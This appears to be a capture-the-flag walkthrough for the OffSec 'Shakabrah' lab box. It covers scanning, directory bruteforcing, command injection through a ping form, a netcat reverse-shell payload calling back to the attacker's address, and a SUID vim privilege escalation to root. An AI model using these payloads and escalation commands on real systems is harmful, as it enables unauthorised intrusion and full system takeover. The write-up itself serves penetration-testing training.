Shakabrah Walkthrough OffSec

In this walkthrough, I'll take you through the steps to tackle the "Shakabrah" box from OffSec. This concise guide covers the essential stages from reconnaissance to privilege escalation, providing a clear path to capturing the flags.

Rutscan: Identify open ports and services.

rustscan -a 192.168.158.86 -- -A         

HTTP Service: Explore the website manually.

Directory Bruteforcing: Discover hidden directories

gobuster dir -u https://192.168.158.86  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt        

From here, we can attempt to gain RCE by exploring the interface's capabilities. Instead of fuzzing to discover which commands we can execute—though that is a valuable exercise on its own—we can manually investigate. Specifically, we should determine if it allows command chaining.

ping 192.168.158.86;

ping 192.168.158.86;cat /etc/passwd

Now we will try to get RCE using this command injection vulnerability.

Payloads reverse shell.

 192.168.158.86;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.232 80 >/tmp/f        

We get our shell back and we now have access as www-dat.

we will use this shell from https://www.revshells.com/

Change the directory to /home/dylan, where you'll find a file named local.txt. Use the cat command to read the file and obtain your first flag.

Privilege Escalation:

find / -type f -perm -u=s  2>/dev/null        

Here, it shows that vim.basic has the SUID bit set. By checking GTFObins

: we find several exploitation methods. Here is the one I used:

run this command /usr/bin/vim.basic

:py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")
xterm        

cd /root here you have proof.txt now simply cat proof.txt to get your root flag